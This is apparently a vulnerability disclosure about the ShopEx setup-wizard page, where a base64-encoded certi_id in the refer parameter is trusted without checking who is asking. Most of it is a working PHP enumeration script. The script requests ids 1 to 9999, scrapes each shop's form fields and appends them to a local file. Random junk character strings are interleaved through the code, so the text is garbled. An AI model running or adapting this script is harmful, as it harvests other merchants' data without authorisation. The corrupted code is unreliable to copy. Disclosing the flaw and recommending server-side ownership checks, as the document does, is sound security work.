|
|
简要描述:
ShopEx某接口缺陷，可遍历所有使用该程序的网站
详细说明:
问题出现在 ShopEx 网店使用向导页面：
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer 参数经 base64 解码（注意：base64 只是编码，并非加密）后为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站（即服务端直接信任客户端提供的 certi_id，未校验其是否属于当前请求方）。
<?php. i( L, c# u2 Y3 K; v U$ g. I8 F
- o! _) N' J3 y
// Driver loop: certi_id is a plain counter, so every value can be requested
// in turn; nothing in the request ties the id to the requesting party.
for ($i=1; $i < 10000; $i++) { // enumerate certi_id values 1..9999
6 D+ u5 Q* [- t2 S! ~4 _6 M H
ShowshopExD($i);
0 C" V) _. q, p" n, L2 h6 n/ W! ?# `( e8 I2 }7 c
}
6 W4 E: R: { Q" j+ o
/**
 * Requests the ShopEx setup-wizard page for one certi_id and dumps the
 * name/value pairs of the text <input> fields the page contains.
 *
 * The id travels inside a base64-encoded JSON blob in the refer query
 * parameter (the same JSON shape as the decoded refer shown in the
 * write-up). base64 is an encoding, not a secret, so the server is in
 * effect trusting a client-chosen certi_id. The defensive fix belongs on
 * the server: bind certi_id to the authenticated caller and reject ids
 * the caller does not own; changing the encoding of refer does not help.
 *
 * @param int|string $cid certi_id to request; coerced with intval().
 * @return void  Output goes to stdout and is appended to c:/shopEx.txt.
 */
6 T& }% z' E: o& g# h function ShowshopExD($cid) {
; v# Q6 ^: t8 y& k: L9 [8 t5 \4 p- B) J$ N! W& F
$url='http://guide.ecos.shopex.cn/step2.php';
6 `3 M Q; t9 S8 q+ b" L
// Only certi_id varies between requests; callback_url is a fixed placeholder.
' }5 v) i" f. f( j9 ^. E- ^8 C $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
/ q5 `# e j8 F
, e4 \6 w6 s; p9 r $url = $url.'?refer='.$refer;
( x6 \0 l6 x) t
3 y2 @# o# B. Y $ch = curl_init($url);3 f% v$ p1 I$ u! V1 ?3 L
E' ?" H* e% D8 P6 V# _5 T
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;* ]7 {* E; t5 |9 t: A
+ y' p1 B6 J z% A( h3 d curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
7 Y/ l J. ]& w( r" E* a) N; f# g( u% x
$result = curl_exec($ch);6 t* H0 e& g( k4 C
9 N/ u) {4 r: U* J! D7 o, K$ [, d
// Response body is transcoded UTF-8 -> gb2312 before any matching.
$result = mb_convert_encoding($result, "gb2312", "UTF-8");4 K( G: J4 t6 N8 w* \: w% Z* j: Q
// A page counts as a hit only when it echoes the refer value back.
8 i0 K; y! N H* o if(strpos($result,$refer))
4 d2 q$ |( Z7 S$ K2 b. q
$ \: `! g% e8 Y+ I. ], e {0 {0 R! P; d7 v% T9 K, Q8 R1 S7 _. w
4 z, k) }6 f9 X8 g1 G9 A( j& S $fp = fopen("c:/shopEx.txt",'ab'); // append extracted fields to a local file
; j1 w# g* O0 N0 { w0 m: K0 e9 n5 D6 h
// Pull every text <input> tag, then its name/value attributes, from the wizard form.
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value); g* }! A5 s: X5 q' v
( B3 n! y! k: ^; e. f foreach ($value[1] as $key) {2 M) u: ?/ O' Y$ r, K* {$ G. f
E+ m# t i5 ` preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
2 n& p3 u; q" L$ k! \6 h) ~
// Each field is written as "name:value", one per line, to stdout and to the file.
+ ^( [$ T$ Y; D) z echo $res[1][0].':'.$res[3][0]."\r\n";6 @0 }+ x4 W) x- i0 A0 Y3 S6 X
9 f* `, b* s1 L; z $col =$res[1][0].':'.$res[3][0]."\r\n";
' o/ X# H/ D$ v( F, t9 o) t3 n0 C3 f/ s! M9 x+ e# j0 S
fwrite($fp, $col, strlen($col));
. F$ \4 D# v2 f9 p j! h4 Y. o" ^; }6 l$ X0 c: }
}
- Z1 s: F! C1 n5 B) b( y
// Separator between records for different certi_id values.
1 j* P5 ~5 @* W' A2 e echo '--------------------------------'."\r\n";5 }! ?) {& B/ @' B& A8 V
/ ?* A: H. b6 D [1 ?7 d fclose($fp);
6 u0 U8 F: e! V( T* |
9 P/ ]9 q9 l7 |! a8 { }
% Q! l8 V4 n Y# V. ]; Z) C0 c: C+ O1 n& y3 H& U
flush();1 J$ R3 X8 A1 _ Y; `5 Q5 B' [
* X( ~( @" a1 O1 X& m+ ~ I curl_close($ch);
" L8 G" e& p- ], \: w3 o q( i3 T/ S' Z; s# Q I1 ]
}
$ Z8 w+ g& m7 y- @4 D- O B
9 ^8 [, q$ m0 z6 k8 ?) c3 W?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer 换成其他加密方式。需要注意的是，仅更换 refer 的编码/加密方式并不能消除该问题：certi_id 仍由客户端提供，根本修复是服务端校验 certi_id 是否属于当前请求方。
$ i5 S4 _" a% u1 z! i |
|